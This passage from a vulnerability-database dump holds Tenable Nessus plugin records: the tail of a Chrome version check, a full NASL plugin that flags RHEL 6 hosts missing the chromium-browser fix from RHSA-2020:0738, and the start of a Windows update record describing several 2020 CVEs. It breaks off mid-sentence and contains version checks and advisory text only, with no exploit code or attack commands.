script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T14:35:02", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:0738 advisory.\n\n - ICU: Integer overflow in UnicodeString::doAppend() (CVE-2020-10531)\n\n - chromium-browser: Type confusion in V8 (CVE-2020-6383, CVE-2020-6418)\n\n - chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n - chromium-browser: Use after free in speech (CVE-2020-6386)\n\n - chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2020:0738)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10531", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6386", "CVE-2020-6407", "CVE-2020-6418"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:rhel_eus:6.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:chromium-browser:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:rhel_els:6:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-0738.NASL", "href": "https://www.tenable.com/plugins/nessus/134360", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0738. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134360);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\n \"CVE-2020-6383\",\n \"CVE-2020-6384\",\n \"CVE-2020-6386\",\n \"CVE-2020-6407\",\n \"CVE-2020-6418\",\n \"CVE-2020-10531\"\n );\n script_xref(name:\"RHSA\", value:\"2020:0738\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0078-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2020:0738)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:0738 advisory.\n\n - ICU: Integer overflow in UnicodeString::doAppend() (CVE-2020-10531)\n\n - chromium-browser: Type confusion in V8 (CVE-2020-6383, CVE-2020-6418)\n\n - chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n - chromium-browser: Use after free in speech (CVE-2020-6386)\n\n - chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6386\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6407\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-10531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807343\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807349\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807498\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807499\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807500\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(190, 843);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/client/6/6Client/i386/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/os',\n 'content/dist/rhel/client/6/6Client/i386/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/os',\n 'content/dist/rhel/client/6/6Client/i386/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/os',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/os',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/os',\n 'content/dist/rhel/client/6/6Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/os',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/optional/debug',\n 'content/dist/rhel/server/6/6Server/i386/optional/os',\n 'content/dist/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/os',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/os',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/os',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/os',\n 'content/els/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/os',\n 'content/els/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/os',\n 'content/els/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/debug',\n 'content/fastrack/rhel/client/6/i386/optional/debug',\n 'content/fastrack/rhel/client/6/i386/optional/os',\n 'content/fastrack/rhel/client/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/os',\n 'content/fastrack/rhel/client/6/i386/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/os',\n 'content/fastrack/rhel/client/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/os',\n 'content/fastrack/rhel/client/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/os',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/os',\n 'content/fastrack/rhel/server/6/i386/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/os',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/optional/debug',\n 'content/fastrack/rhel/server/6/i386/optional/os',\n 'content/fastrack/rhel/server/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/server/6/x86_64/hpn/os',\n 'content/fastrack/rhel/server/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/os',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/optional/debug',\n 'content/fastrack/rhel/server/6/x86_64/optional/os',\n 'content/fastrack/rhel/server/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/os',\n 'content/fastrack/rhel/workstation/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/os',\n 'content/fastrack/rhel/workstation/6/i386/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-05T14:16:45", "description": "The remote Windows host is missing security update 4550957 or cumulative update 4550951. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles 